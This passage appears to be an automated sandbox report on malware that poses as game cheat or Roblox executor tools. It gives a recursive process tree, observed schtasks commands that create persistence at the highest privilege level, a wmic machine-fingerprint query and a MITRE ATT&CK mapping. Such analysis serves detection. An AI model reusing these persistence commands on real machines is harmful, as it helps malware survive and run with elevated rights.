depth 57  PID 2740  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 58  PID 264  image: C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
depth 58  PID 2980  image: C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
depth 57  PID 2652  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 58  PID 2020  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 59  PID 2564  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 60  PID 2696  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 57  PID 1680  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 58  PID 1912  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 59  PID 2056  image: C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
depth 59  PID 484  image: C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
depth 60  PID 1692  image: C:\Windows\System32\Wbem\wmic.exe  cmdline: "wmic.exe" csproduct get uuid
depth 58  PID 764  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 59  PID 884  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 60  PID 668  image: C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
- Loads dropped DLL
depth 61  PID 2088  image: C:\hostNet\bridgeblockportComBroker.exe  cmdline: "C:\hostNet/bridgeblockportComBroker.exe"
depth 58  PID 2624  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 59  PID 1536  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 59  PID 1920  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 60  PID 2616  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 59  PID 2472  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 60  PID 2448  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 60  PID 864  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 61  PID 2160  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 60  PID 584  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 61  PID 296  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 61  PID 2856  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 62  PID 864  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 61  PID 2560  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 62  PID 1932  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 62  PID 1608  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 63  PID 1728  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 62  PID 2508  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 63  PID 2176  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 63  PID 756  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 64  PID 924  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 63  PID 2024  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 64  PID 1152  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 64  PID 1536  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 65  PID 2224  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 64  PID 2476  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 65  PID 796  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 65  PID 2740  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 66  PID 1552  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 65  PID 2788  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 66  PID 2500  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 66  PID 1480  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 67  PID 1852  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 66  PID 2572  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 67  PID 2644  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 67  PID 2724  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 68  PID 2716  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 67  PID 996  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 68  PID 2744  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 68  PID 2756  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 69  PID 1208  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 68  PID 296  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 69  PID 1332  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 69  PID 2860  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 70  PID 2028  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 69  PID 2444  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 70  PID 2704  image: C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
depth 70  PID 2856  image: C:\Users\Admin\AppData\Local\Temp\sol.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\sol.exe"
depth 71  PID 2404  image: C:\Windows\SysWOW64\WScript.exe  cmdline: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
depth 70  PID 584  image: C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
depth 1  PID 948  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 10 /tr "'C:\hostNet\taskhost.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 1328  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\hostNet\taskhost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 1788  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\hostNet\taskhost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 2544  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Recovery\8f60a382-0d98-11ef-817d-5aba25856535\wscript.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 2680  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\8f60a382-0d98-11ef-817d-5aba25856535\wscript.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 1800  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 11 /tr "'C:\Recovery\8f60a382-0d98-11ef-817d-5aba25856535\wscript.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 2424  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "LoaderL" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Loader.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 2644  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "Loader" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Loader.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 1264  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "LoaderL" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Loader.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 2904  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Mail\en-US\sppsvc.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 2716  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\en-US\sppsvc.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 2700  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Mail\en-US\sppsvc.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 264  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 628  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 696  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 2976  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 6 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 1452  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 1676  image: C:\Windows\system32\schtasks.exe  cmdline: schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 13 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
depth 1  PID 2208  image: C:\Windows\system32\taskeng.exe  cmdline: taskeng.exe {916FEB13-D21F-486C-91A1-F1FED06CA314} S-1-5-21-2737914667-933161113-3798636211-1000:PUMARTNR\Admin:Interactive:[1]
depth 2  PID 2136  image: C:\Users\Admin\AppData\Roaming\svhost.exe  cmdline: C:\Users\Admin\AppData\Roaming\svhost.exe
depth 2  PID 2704  image: C:\Users\Admin\AppData\Roaming\svhost.exe  cmdline: C:\Users\Admin\AppData\Roaming\svhost.exe
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (2): Registry Run Keys / Startup Folder (1), Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2): Registry Run Keys / Startup Folder (1), Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Downloads